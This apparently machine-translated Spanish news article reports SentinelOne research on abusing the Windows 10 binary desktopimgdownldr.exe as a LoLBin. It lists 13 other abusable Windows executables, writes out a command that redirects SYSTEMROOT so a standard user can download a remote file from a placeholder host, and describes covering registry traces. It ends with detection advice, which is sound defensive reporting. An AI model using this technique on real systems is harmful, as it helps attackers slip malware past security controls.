Un binario en Windows 10 responsable de configurar una imagen para el escritorio y la pantalla de bloqueo puede ayudar a los atacantes a descargar malware en un sistema comprometido sin dar la alarma.
Conocidos como binarios que viven fuera de la tierra (LoLBins), estos archivos vienen con el sistema operativo y tienen un propósito legítimo. Los atacantes de todos los colores están abusando de ellos en las fases posteriores a la explotación para ocultar actividades maliciosas.
El nuevo LoL en la papelera
Un atacante puede usar LoLBins para descargar e instalar malware, omitir los controles de seguridad como UAC o WDAC. Por lo general, el ataque involucra malware sin archivos y servicios en la nube de buena reputación.
Un informe de Cisco Talos del año pasado proporciona una lista de 13 ejecutables nativos de Windows que pueden descargar y ejecutar código malicioso:
powershell.exe, bitsadmin.exe, certutil.exe, psexec.exe, wmic.exe, mshta.exe, mofcomp.exe, cmstp.exe, windbg.exe, cdb.exe, msbuild.exe, csc.exe, regsvr32.exe
Los investigadores de SentinelOne descubrieron que "desktopimgdownldr.exe", ubicado en la carpeta system32 de Windows 10, también puede servir como LoLBin.
El ejecutable es parte del Personalization CSP (proveedor de servicios de configuración) que permite, entre otros, definir la pantalla de bloqueo y las imágenes de fondo del escritorio.
En ambos casos, la configuración acepta archivos JPG, JPEG, PNG que se almacenan localmente o de forma remota (admite URL HTTP / S).
Trucos simples
Gal Kristal de SentinelOne dice que ejecutar desktopimgdownldr.exe con privilegios de administrador anula la imagen de la pantalla de bloqueo definida por el usuario, alertando de algo sospechoso.
Sin embargo, esto se puede evitar si el atacante elimina un valor de registro inmediatamente después de ejecutar la ejecución del binario, sin dejar al usuario más sabio.
Kristal descubrió que si bien el ejecutable parece requerir altos privilegios (administrador) para que pueda crear archivos en C: \ Windows y en el registro, también puede ejecutarse como un usuario estándar para descargar archivos de una fuente externa.
Esto es posible cambiando la ubicación de la variable de entorno% systemroot% antes de ejecutar el binario. Esto da como resultado la modificación del destino de descarga y eludir las comprobaciones de acceso.
set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
Sin derechos de administrador, no es posible escribir en el registro, por lo que la imagen de la pantalla de bloqueo permanece sin cambios. En este escenario, el método no crea otros artefactos que el archivo descargado.
Si el atacante obtiene privilegios de administrador, puede eliminar todas las pistas creadas por el descargador en el registro de Windows para Personalization CSP.
Kristal dice que el ejecutable usa BITS COM Object para descargar un archivo y en algunas máquinas trata de ubicar el Catálogo de Registro COM + en la ubicación% systemroot%. Como el atacante cambia la variable de entorno, el intento falla.
Sin embargo, al crear un enlace simbólico con la utilidad mklink.exe, un usuario estándar puede solucionar este problema, dice Kristal en una investigación publicada hoy.
Recomienda a los usuarios de soluciones de detección y respuesta de punto final que agreguen "desktopimgdownldr.exe" a sus consultas y listas de observación y lo traten como si fuera "certutil.exe", un LoLBin ampliamente utilizado, tanto por piratas informáticos avanzados que hacen una oferta del gobierno como por ciberdelincuentes establecidos en la puntuación Gran dinero.
Si esta pagina te ha sido util, compartela en las redes sociales, gracias
